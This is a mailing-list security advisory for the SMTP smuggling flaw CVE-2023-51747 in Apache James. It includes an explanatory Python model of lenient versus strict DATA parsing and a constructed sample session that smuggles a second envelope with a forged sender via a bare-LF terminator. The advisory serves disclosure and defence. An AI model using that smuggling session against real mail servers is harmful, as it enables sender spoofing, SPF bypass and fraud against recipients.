List: james-user
Subject: CVE-2023-51747: SMTP smuggling in Apache James
From: Benoit Tellier <btellier () apache ! org>
Date: 2024-02-27 12:28:33
Message-ID: 5180c151-2a7a-75c2-49e9-797342d8fe5a () apache ! org
Severity: important
Affected versions:
- Apache James server through 3.7.4
- Apache James server 3.8 through 3.8.0
Description:
Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling.
Lenient line-delimiter handling can create a difference of interpretation between
the sender and the receiver of a message, which an attacker can exploit to forge an
SMTP envelope, for instance to bypass SPF checks.
The patch enforces CRLF as the line delimiter within the DATA transaction.
We recommend that James users upgrade to a non-vulnerable version.
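The difference of interpretation described above, as an added example that is not Apache James code (James is written in Java; this Python stand-in models only the receiver's side of the DATA transaction): a minimal SMTP receiver that accepts a bare LF as a line delimiter splits one constructed session into two envelopes, the second carrying a forged MAIL FROM, while a receiver that requires CRLF, as the fix enforces, keeps the smuggled text inside the body of a single message. All host names, addresses and session bytes are constructed for the example; EHLO, server replies and dot-unstuffing are omitted.

```python
import re
from dataclasses import dataclass

CRLF = b"\r\n"

# RFC 5321 ends the DATA section only at <CRLF>.<CRLF>. A receiver that also
# treats a bare <LF> as a line delimiter will match the second pattern too.
STRICT_EOD = re.compile(rb"\r\n\.\r\n")
LENIENT_EOD = re.compile(rb"\r?\n\.\r?\n")


@dataclass
class Message:
    """One envelope the receiver believes it accepted (constructed model)."""
    mail_from: str
    rcpt_to: list
    body: bytes


def _next_line(buf: bytes, strict_crlf: bool):
    """Split off the next command line; returns (line, rest) or (None, buf)."""
    m = re.search(rb"\r\n" if strict_crlf else rb"\r?\n", buf)
    if m is None:
        return None, buf
    return buf[:m.start()], buf[m.end():]


def _addr(line: bytes, prefix_len: int) -> str:
    return line[prefix_len:].strip().strip(b"<>").decode()


def receive(session: bytes, strict_crlf: bool) -> list:
    """Model of the server side of one SMTP session (EHLO and replies omitted).

    strict_crlf=False: a bare <LF> delimits lines, so "<LF>.<LF>" ends DATA.
    strict_crlf=True:  only <CRLF>.<CRLF> ends DATA (what the fix enforces).
    Dot-unstuffing of body lines is omitted; it does not affect the split.
    """
    accepted = []
    mail_from, rcpts = None, []
    buf = session
    while True:
        line, buf = _next_line(buf, strict_crlf)
        if line is None:
            break
        verb = line.upper()
        if verb.startswith(b"MAIL FROM:"):
            mail_from = _addr(line, len(b"MAIL FROM:"))
        elif verb.startswith(b"RCPT TO:"):
            rcpts.append(_addr(line, len(b"RCPT TO:")))
        elif verb == b"DATA":
            # The delimiter that ended the DATA line is the first <CRLF> of a
            # possible terminator, so prepend one before searching.
            haystack = CRLF + buf
            m = (STRICT_EOD if strict_crlf else LENIENT_EOD).search(haystack)
            if m is None:
                break  # DATA never terminated: nothing accepted
            body = haystack[len(CRLF):m.start()]
            accepted.append(Message(mail_from, rcpts, body))
            mail_from, rcpts = None, []
            buf = haystack[m.end():]
        elif verb == b"QUIT":
            break
    return accepted


def contains_bare_lf(data: bytes) -> bool:
    """True if data has an <LF> not preceded by <CR>. A strict receiver may
    reject such DATA outright instead of passing it through as body bytes."""
    return re.search(rb"(?<!\r)\n", data) is not None


# Constructed sample session as the receiving server sees it. The connecting
# peer is assumed to be trusted.example's outbound relay, which passed the
# bare "<LF>.<LF>" through as ordinary message data.
SMUGGLED_SESSION = (
    b"MAIL FROM:<attacker@trusted.example>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"Subject: outer message\r\n"
    b"\r\n"
    b"harmless text\n"
    b".\n"                                  # bare-LF end-of-data: the pivot
    b"MAIL FROM:<ceo@trusted.example>\r\n"  # forged sender on the relay's own domain
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"Subject: forged message\r\n"
    b"\r\n"
    b"please wire the money\r\n"
    b".\r\n"
    b"QUIT\r\n"
)


if __name__ == "__main__":
    for strict in (False, True):
        msgs = receive(SMUGGLED_SESSION, strict_crlf=strict)
        print(f"strict_crlf={strict}: {len(msgs)} envelope(s) accepted")
        for msg in msgs:
            print(f"  MAIL FROM {msg.mail_from!r} -> {msg.rcpt_to}, "
                  f"bare LF in body: {contains_bare_lf(msg.body)}")
```

The lenient receiver accepts the forged envelope as a separate message whose MAIL FROM is on the relay's domain, so an SPF check on the connecting IP passes. The strict receiver never sees a terminator until the final CRLF.CRLF, so the forged commands stay inside the first message's body; whether such a body with a bare LF is then delivered as-is or rejected is a separate policy choice, which `contains_bare_lf` lets the caller make.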
Credit:
Benoit TELLIER (coordinator)
References:
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
https://postfix.org/smtp-smuggling.html
https://james.apache.org/
https://www.cve.org/CVERecord?id=CVE-2023-51747